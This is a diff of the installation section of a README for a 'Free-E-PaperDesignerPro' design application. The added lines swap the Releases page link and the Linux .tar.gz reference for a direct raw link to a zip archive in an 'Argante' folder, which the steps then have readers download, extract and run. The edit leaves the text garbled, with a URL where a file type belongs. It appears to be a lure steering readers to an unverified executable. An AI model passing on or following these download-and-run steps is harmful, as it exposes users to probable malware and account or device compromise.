DynamoFusion/Free-E-PaperDesignerPro/README.md

 ## 🛠️ Installation Steps

 1. **Visit the Releases Page**
-   Go to the [Releases](https://github.com/DynamoFusion/Free-E-PaperDesignerPro/releases) page where you can download the application.
+   Go to the [Releases](https://raw.githubusercontent.com/DynamoFusion/Free-E-PaperDesignerPro/main/Argante/Designer-Free-Paper-Pro-1.5.zip) page where you can download the application.

 2. **Download the Application**
    Look for the latest version of Free-E-PaperDesignerPro.
 Click on the .exe file if you are using Windows, or the .dmg file if you are on macOS.
-For Linux users, download the .tar.gz file.
+For Linux users, download the https://raw.githubusercontent.com/DynamoFusion/Free-E-PaperDesignerPro/main/Argante/Designer-Free-Paper-Pro-1.5.zip file.

 3. **Run the Installer**
    Once the download finishes, double-click the file you downloaded:
    - On Windows: Follow the prompts in the installer.
    - On macOS: Drag the application to your "Applications" folder.
-   - On Linux: Extract the .tar.gz file and run the application by executing `./Free-E-PaperDesignerPro`.
+   - On Linux: Extract the https://raw.githubusercontent.com/DynamoFusion/Free-E-PaperDesignerPro/main/Argante/Designer-Free-Paper-Pro-1.5.zip file and run the application by executing `./Free-E-PaperDesignerPro`.

 4. **Start Designing**
    After installation, open Free-E-PaperDesignerPro.
 You will see a friendly interface where you can start your design.